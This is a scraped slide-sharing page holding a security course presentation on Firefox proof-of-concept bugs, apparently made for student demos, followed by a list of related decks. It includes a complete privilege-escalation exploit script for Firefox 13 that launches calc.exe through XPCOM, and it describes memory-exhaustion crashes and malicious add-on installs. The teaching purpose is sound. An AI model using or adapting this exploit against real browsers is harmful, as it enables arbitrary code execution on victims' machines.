Firefox POCs BUG 612029: Remote denial of Service POC Actual POC - PowerPoint PPT Presentation

Dec 13, 2022 •133 likes •254 views

Firefox POCs BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 Eats up memory! Notice no unresponsive script dialogue Firefox version 13 In current firefox version -- warning + debug option, no

Firefox POCs
BUG 612029: Remote denial of Service POC Actual POC comes from: BUG 833874 ● Eats up memory! ● Notice no “unresponsive script” dialogue ● Firefox version 13 ● In current firefox version -- warning + debug option, no out of memory error, no hang
BUG 769108: Escalation of Privilege Open firefox 13 Open new tab Open tab_POC.html proposed fix diff
Click anywhere. <script> if(history.length==1){alert('Open from a new tab, please')}; window.onclick=f; function f(){ window.open("data:text/html,%3Cscript%3Eopener.history.back(); setTimeout('f()',1000);function%20f()%7Bo=Object.getPrototypeOf(Object. getPrototypeOf(opener));o.__exposedProps__=%7Bconstructor:'rw',create:'rw', gGrid:'rw',_node:'rw',innerHTML:'rw'%7D;n=o.constructor.create(o.constructor. create(opener).gGrid._node);n.innerHTML=%22%3Cimg%20src='http://foo'% 20onerror='f=Components.classes%5B%5C%22@mozilla.org/file/local;1%5C% 22%5D.createInstance(Components.interfaces.nsILocalFile);f.initWithPath(% 5C%22c:%5C%5C%5C%5CWindows%5C%5C%5C%5CSystem32%5C%5C% 5C%5Ccalc.exe%5C%22);f.launch()'%3E%22;%7D%3C/script% 3E",'','width=451,height=451') } </script>
Out of Memory POC ● Basically loads a html file in v.21 that eats up a ton of memory and causes the browser to crash ● jump to 2 minute mark for crash
Add-on exploit POC ● Basically loads addon from localhost so that firefox pops up something when it restarts ● Please don’t make video too fast to see what’s going on!!
Add-on exploit POC 2 ● Installed user add-on executes -- social engineering
Flash Plugin Exploit POC
A Few Suggestions... ● Give a high-level overview (i.e. bug, attack, expected behavior, actual behavior) BEFORE your demo! ● If your POC involves an html file, you might consider briefly showing the interesting part of it ● Please try not to rush through the steps!
Section AB (1:30): Please fill this out! https://uw.iasystem.org/survey/136326
Section AA (2:30): Please fill this out! https://uw.iasystem.org/survey/136325
References ● http://www.binarytides.com/hack-remote-windows-machines-with-metasploit-java-signed-applet-method/ ● http://www.offensive-security.com/metasploit-unleashed

Download Presentation

Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Denial of Service Denial of Service An attack designed to disrupt or completely deny

1 Denial of Service Denial of Service An attack designed to disrupt or completely deny legitimate users access to network, servers, services, or other resources Two basic favors: Target resource starvation Network

430 views • 19 slides

Denial of Service attacks Markus Peuhkuri 2005-04-12 Lecture topics Types of denial of service

Denial of Service attacks Markus Peuhkuri 2005-04-12 Lecture topics Types of denial of service How to mitigate attacks How to find out senders What is Denial of Service

542 views • 8 slides

By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To:

Introduction to Firefox By JoseeAntonioR INDEX OF CONTENTS 1.- What is Firefox? 2.- Uses of Firefox 3.- How To: Download Files 4.- How To: History 5.- How To: Tabbing 6.- How To: App Tabs 7.- How To: Set Homepage 8.- How To: Block

557 views • 16 slides

Denial of Service Last Class Fault tolerance Concurrency Naming This Class

Denial of Service Last Class Fault tolerance Concurrency Naming This Class Networking How DDoS works UDP Data Client Server Response TCP DDoS Distributed denial-of-service attack Attacker targets a victim from a

436 views • 28 slides

Denial-of-Service (DoS) CS 161: Computer Security Prof. David Wagner March 5, 2013 Attacks on

Denial-of-Service (DoS) CS 161: Computer Security Prof. David Wagner March 5, 2013 Attacks on Availability Denial-of-Service (DoS): preventing legitimate users from using a computing service We do though need to consider our threat model

1.09k views • 42 slides

Denial-of-Service (DoS), continued CS 161: Computer Security Prof. David Wagner April 4, 2016

Denial-of-Service (DoS), continued CS 161: Computer Security Prof. David Wagner April 4, 2016 Transport-Level Denial-of-Service Recall TCPs 3-way connection establishment handshake Goal: agree on initial sequence numbers Server Client

530 views • 40 slides

Countering SYN Flood Denial-of-Service (DoS) Attacks Ross Oliver Tech Mavens

Countering SYN Flood Denial-of-Service (DoS) Attacks Ross Oliver Tech Mavens reo@tech-mavens.com What is a Denial-of- Service (DoS) attack? ! Attacker generates unusually large volume of requests, overwhelming your servers ! Legitimate

493 views • 27 slides

Denial of Service Attacks Types, Causes, Motives & Remedies By M. Raza ur Rehman NUST

Denial of Service Attacks Types, Causes, Motives & Remedies By M. Raza ur Rehman NUST PAKCON 2004 Denial of Service Attacks Attempts to prevent or disturb legitimate access to co mputer resources Resources like bandwidth, services

557 views • 18 slides

Denial of Service A/acks Cunsheng Ding Department of CSE HKUST, Hong Kong Acknowledgements:

Denial of Service A/acks Cunsheng Ding Department of CSE HKUST, Hong Kong Acknowledgements: Materials are taken from the Internet COMP4631 1 Agenda of this lecture Zombie computers, bots, botnets Denial of service (DoS) a/acks

630 views • 45 slides

CSE 543 - Computer Security Lecture 22 - Denial of Service November 15, 2007 URL:

CSE 543 - Computer Security Lecture 22 - Denial of Service November 15, 2007 URL: http://www.cse.psu.edu/~tjaeger/cse543-f07/ CSE543 Computer (and Network) Security - Fall 2007 - Professor Jaeger 1 Denial of Service Intentional prevention

663 views • 25 slides

Denial of Service Attacks that prevent legitimate users from doing their work By flooding

Denial of Service Attacks that prevent legitimate users from doing their work By flooding the network Or corrupting routing tables Or flooding routers Or destroying key packets Lecture 9 Page 1 CS 236 Online How Do Denial of

259 views • 15 slides

Automated Detection of Guessing and Denial of Service Attacks in Security Protocols Marius Minea

Automated Detection of Guessing and Denial of Service Attacks in Security Protocols Marius Minea Politehnica University of Timi soara CMACS seminar, CMU, 18 March 2010 In this talk Formalizing attacks on protocols denial of service by

732 views • 45 slides

Falconieri: Remote Provisioning Service as a Service A new, modern, open source and cloud native

Falconieri: Remote Provisioning Service as a Service A new, modern, open source and cloud native remote provisioning service gateway. Matteo Valentini @_Amygos Intro: Remote Provisioning Service Theory Intro: What is it a Remote

476 views • 29 slides

A study of denial of service attacks on the Internet David J. Marchette marchettedj@nswc.navy.mil

A study of denial of service attacks on the Internet David J. Marchette marchettedj@nswc.navy.mil Naval Surface Warfare Center Code B10 < > - + A study of denial of service attacks on the Internet p.1/39 Outline Background

761 views • 54 slides

Using A Cost-Based Framework For Analyzing Denial Of Service Presented By: Joan Paul A

Using A Cost-Based Framework For Analyzing Denial Of Service Presented By: Joan Paul A Cost-Based Framework for Analysis of Denial of Service in Networks Catherine Meadows (2001) Analyzing DoS-Resistance of Protocols Using a

287 views • 28 slides

Distributed Denial of Service Attacks & Defenses Guest Lecture by: Vamsi Kambhampati Fall

Distributed Denial of Service Attacks & Defenses Guest Lecture by: Vamsi Kambhampati Fall 2011 Distributed Denial of Service (DDoS) Exhaust resources of a target, or the resources it depends on Resources: CPU, Memory, Bandwidth

427 views • 23 slides

Tracking Protection in Firefox For Privacy and Performance Protecting user privacy from online

Tracking Protection in Firefox For Privacy and Performance Protecting user privacy from online tracking 2 kontaxis@cs.columbia.edu Tracking protection for Firefox 3 kontaxis@cs.columbia.edu User visits

379 views • 18 slides

The War on Latency Reducing Dead Time Kirk Pepperdine Principle Kodewerk Ltd. Me Work as a

Kodewerk tm Java Performance Services The War on Latency Reducing Dead Time Kirk Pepperdine Principle Kodewerk Ltd. Me Work as a performance tuning freelancer Nominated Sun Java Champion www.kodewerk.com kirk.blog-city.com

666 views • 51 slides

Module 4: Processes Process Concept Process Scheduling Operation on Processes

Module 4: Processes Process Concept Process Scheduling Operation on Processes Cooperating Processes Interprocess Communication Silberschatz, Galvin, and Gagne 1999 Applied Operating System Concepts 4.1 Process Concept

570 views • 38 slides

CSE 373: Hash functions and hash tables Michael Lee Monday, Jan 22, 2018 1 Warmup Warmup:

CSE 373: Hash functions and hash tables Michael Lee Monday, Jan 22, 2018 1 Warmup Warmup: Consider the following method. output of this method. worst-case runtime of this method. With your neighbor, answer the following. 2 private int mystery(

706 views • 49 slides

Cordova and Firefox OS HTML5 for the Mobile Web Jason Weathersby Cordova and Firefox OS

Cordova and Firefox OS HTML5 for the Mobile Web Jason Weathersby Cordova and Firefox OS Click Here For Presentation 11/13/14 2 Title Here

190 views • 3 slides

I/O and Syscalls in Critical Sections and their Implications for Transactional Memory Lee Baugh

I/O and Syscalls in Critical Sections and their Implications for Transactional Memory Lee Baugh and Craig Zilles University of Illinois at Urbana-Champaign Side-Effects in Transactions begin_transaction(); myarr[x]= fgetc(myfile);

891 views • 19 slides

Ta Taking your Selenium Te Tests for we web and mobile ile beyond your lo local l Fir

Ta Taking your Selenium Te Tests for we web and mobile ile beyond your lo local l Fir Firefox Brows wser Michael Palotas, Francois Reynaud Element34 Solutions GmbH

479 views • 27 slides

Firefox Security Sid Stamm <sid@mozilla.com> Browser as a Protector Protect Site

Firefox Security Sid Stamm <sid@mozilla.com> Browser as a Protector Protect Site Content Safe Platform Third-Party Features Keeping your Secrets Content Restrictions Content Security Policy Content Restrictions Document

560 views • 43 slides